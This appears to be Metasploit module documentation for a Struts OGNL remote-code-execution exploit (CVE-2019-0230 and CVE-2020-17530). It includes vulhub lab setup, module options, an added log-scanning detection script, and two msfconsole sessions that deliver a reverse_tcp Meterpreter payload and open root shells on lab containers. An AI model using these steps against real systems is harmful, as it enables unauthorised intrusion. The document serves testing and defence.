## Vulnerable Application
The Apache Struts framework, when forced, performs double evaluation of values assigned to certain tag attributes such as `id`. It is therefore possible to pass a value to Struts that will be evaluated again when a tag's attributes are rendered. With a carefully crafted request, this can lead to Remote Code Execution (RCE).

This vulnerability is application dependent: a server-side template must make an affected use of request data to render an HTML tag attribute.
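Because the bug only matters where request data is reflected into a tag attribute, one defensive check is to look for the OGNL expression delimiters (`%{` and `${`) arriving in request parameters. The following Python script is an added example, not part of the Metasploit module or this documentation: it scans constructed access-log lines (hosts, paths and parameter names are made up) and percent-decodes repeatedly so double-encoded values are not missed.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed sample access-log lines (combined format); hosts, paths and values are made up.
SAMPLE_LOG = """\
10.0.0.5 - - [15/Dec/2020:19:43:28 -0500] "GET /index.action?id=hello HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.7 - - [15/Dec/2020:19:43:29 -0500] "GET /index.action?id=%25%7B3*3%7D HTTP/1.1" 200 512 "-" "curl/7.68.0"
10.0.0.9 - - [15/Dec/2020:19:43:30 -0500] "GET /index.action?id=%24%7Bname%7D HTTP/1.1" 200 512 "-" "curl/7.68.0"
10.0.0.9 - - [15/Dec/2020:19:43:31 -0500] "GET /index.action?id=%2525%257B7*7%257D HTTP/1.1" 200 512 "-" "curl/7.68.0"
10.0.0.5 - - [15/Dec/2020:19:43:32 -0500] "POST /index.action HTTP/1.1" 200 512 "-" "Mozilla/5.0"
"""

# Request line of the combined log format: client, timestamp, method, request target, status.
REQUEST_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# Struts evaluates "%{...}" and "${...}" as OGNL; a user-supplied value containing either is suspicious.
OGNL_MARKER_RE = re.compile(r'[%$]\{')


def decode_fully(value, max_rounds=3):
    """Percent-decode repeatedly so a double-encoded marker (e.g. %2525%257B) is still recognised."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def find_ognl_parameters(log_text):
    """Return (source, method, parameter, decoded value) for each query parameter holding an OGNL delimiter.
    Only the query string is in an access log; POST form data needs request-body logging to inspect."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        query = urlsplit(m.group('target')).query
        for name, raw in parse_qsl(query, keep_blank_values=True):
            value = decode_fully(raw)  # parse_qsl has already decoded one layer
            if OGNL_MARKER_RE.search(value):
                hits.append((m.group('src'), m.group('method'), name, value))
    return hits


if __name__ == '__main__':
    for src, method, name, value in find_ognl_parameters(SAMPLE_LOG):
        print(f'{src} {method} param={name!r} value={value!r}')
```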
Vulnerable versions of Apache Struts for both CVEs are provided by vulhub on GitHub. The setup instructions are identical for both CVEs; just use the provided files in the correct directory.

- Use `git` to clone `https://github.com/vulhub/vulhub.git`.
- Change the current working directory to the one corresponding to the CVE that should be tested. For CVE-2019-0230, use `struts2/s2-059` and for CVE-2020-17530, use `struts2/s2-061`.
- From within the directory, run `docker-compose up -d`.
- (OPTIONAL) Run `docker-compose exec struts2 bash` to obtain an interactive shell within the container. This is useful for debugging purposes.

- CVE-2019-0230 was patched in 2.5.20
- CVE-2020-17530 was patched in 2.5.26
### Example Setting Up CVE-2020-17530 / S2-061

```
[smcintyre@localhost ~]$ git clone https://github.com/vulhub/vulhub.git
Cloning into 'vulhub'...
remote: Enumerating objects: 234, done.
remote: Counting objects: 100% (234/234), done.
remote: Compressing objects: 100% (141/141), done.
remote: Total 10171 (delta 86), reused 191 (delta 69), pack-reused 9937
Receiving objects: 100% (10171/10171), 130.98 MiB | 8.36 MiB/s, done.
Resolving deltas: 100% (4014/4014), done.
[smcintyre@localhost ~]$ cd vulhub/struts2/s2-061
[smcintyre@localhost s2-061]$ docker-compose up -d
Creating network "s2-061_default" with the default driver
Pulling struts2 (vulhub/struts2:2.5.25)...
2.5.25: Pulling from vulhub/struts2
756975cb9c7e: Pull complete
d77915b4e630: Pull complete
5f37a0a41b6b: Pull complete
96b2c1e36db5: Pull complete
27a2d52b526e: Pull complete
93a36defce60: Pull complete
9e2014d79b30: Pull complete
ac71d4ce2ce4: Pull complete
a2f817e4badf: Pull complete
62ac51b7362f: Pull complete
e12f6705ebbe: Pull complete
4f4fb700ef54: Pull complete
97ba98138d72: Pull complete
Digest: sha256:eaf49b95f2c178cca77d3c8454f79a4fe4ed4dd9d342c9e9a911e842565217d2
Status: Downloaded newer image for vulhub/struts2:2.5.25
Creating s2-061_struts2_1 ... done
[smcintyre@localhost s2-061]$ docker-compose exec struts2 bash
root@d37b5ab61b87:/usr/src#
```
## Verification Steps

- Install the vulnerable application (see the "Vulnerable Application" section).
- Start `msfconsole`
- Do: `use exploit/multi/http/struts2_multi_eval_ognl`
- Set `RHOSTS` to the address of the target(s) to exploit.
- Set `CVE` to the ID of the CVE you wish to run against the target: either `CVE-2020-17530` or `CVE-2019-0230`.
- Do: `run`
## Options

### NAME

The HTTP query parameter or form data name. This option is closely related to the vulnerability and will likely be application specific in real-world environments. This must be the name of a parameter sent through either a GET or POST request to the application that is reflected back as an HTML attribute. The module's `check` method uses this value to determine if it can be used to evaluate OGNL expressions.

### CVE

The CVE to attempt to exploit on `RHOSTS`, either `CVE-2020-17530` or `CVE-2019-0230`.

### TARGETURI

The base path to a valid Struts application on the target machine or machines.

### CMDSTAGER::DELAY

Delay between command executions. Set this value higher if the target tends to be slow to respond.

### HttpCookie

An optional cookie to include when making the HTTP request.
## Scenarios

### CVE-2020-17530 From Vulhub

```
msf6 > use exploit/multi/http/struts2_multi_eval_ognl
[*] No payload configured, defaulting to cmd/unix/reverse_netcat
msf6 exploit(multi/http/struts2_multi_eval_ognl) > set RHOSTS 192.168.159.128
RHOSTS => 192.168.159.128
msf6 exploit(multi/http/struts2_multi_eval_ognl) > set TARGET Linux\ Dropper
TARGET => Linux Dropper
msf6 exploit(multi/http/struts2_multi_eval_ognl) > set PAYLOAD linux/x64/meterpreter/reverse_tcp
PAYLOAD => linux/x64/meterpreter/reverse_tcp
msf6 exploit(multi/http/struts2_multi_eval_ognl) > set LHOST 192.168.159.128
LHOST => 192.168.159.128
msf6 exploit(multi/http/struts2_multi_eval_ognl) > check
[*] 192.168.159.128:8080 - The target appears to be vulnerable.
msf6 exploit(multi/http/struts2_multi_eval_ognl) > exploit
[*] Started reverse TCP handler on 192.168.159.128:4444
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable.
[*] Executing Linux Dropper for linux/x64/meterpreter/reverse_tcp using CVE-2020-17530
[*] Command Stager progress - 44.15% done (362/820 bytes)
[*] Sending stage (3008420 bytes) to 172.18.0.2
[*] Meterpreter session 1 opened (192.168.159.128:4444 -> 172.18.0.2:46770) at 2020-12-15 19:43:28 -0500
[*] Command Stager progress - 100.00% done (820/820 bytes)
meterpreter > getuid
Server username: root @ d37b5ab61b87 (uid=0, gid=0, euid=0, egid=0)
meterpreter > sysinfo
Computer : 172.18.0.2
OS : Debian 10.6 (Linux 5.9.11-100.fc32.x86_64)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter >
```
### CVE-2019-0230 From Vulhub

```
msf6 > use exploit/multi/http/struts2_multi_eval_ognl
[*] No payload configured, defaulting to cmd/unix/reverse_netcat
msf6 exploit(multi/http/struts2_multi_eval_ognl) > set RHOSTS 192.168.159.128
RHOSTS => 192.168.159.128
msf6 exploit(multi/http/struts2_multi_eval_ognl) > set CVE CVE-2019-0230
CVE => CVE-2019-0230
msf6 exploit(multi/http/struts2_multi_eval_ognl) > set TARGET Linux\ Dropper
TARGET => Linux Dropper
msf6 exploit(multi/http/struts2_multi_eval_ognl) > set LHOST 192.168.159.128
LHOST => 192.168.159.128
msf6 exploit(multi/http/struts2_multi_eval_ognl) > check
[*] 192.168.159.128:8080 - The target appears to be vulnerable.
msf6 exploit(multi/http/struts2_multi_eval_ognl) > exploit
[*] Started reverse TCP handler on 192.168.159.128:4444
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable.
[*] Executing Linux Dropper for linux/x64/meterpreter/reverse_tcp using CVE-2019-0230
[*] Command Stager progress - 44.15% done (362/820 bytes)
[*] Sending stage (3008420 bytes) to 172.19.0.2
[*] Command Stager progress - 100.00% done (820/820 bytes)
[*] Meterpreter session 1 opened (192.168.159.128:4444 -> 172.19.0.2:47884) at 2020-12-15 19:47:10 -0500
meterpreter > getuid
Server username: root @ 91f7855f1eda (uid=0, gid=0, euid=0, egid=0)
meterpreter > sysinfo
Computer : 172.19.0.2
OS : Debian 10.5 (Linux 5.9.11-100.fc32.x86_64)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter >
```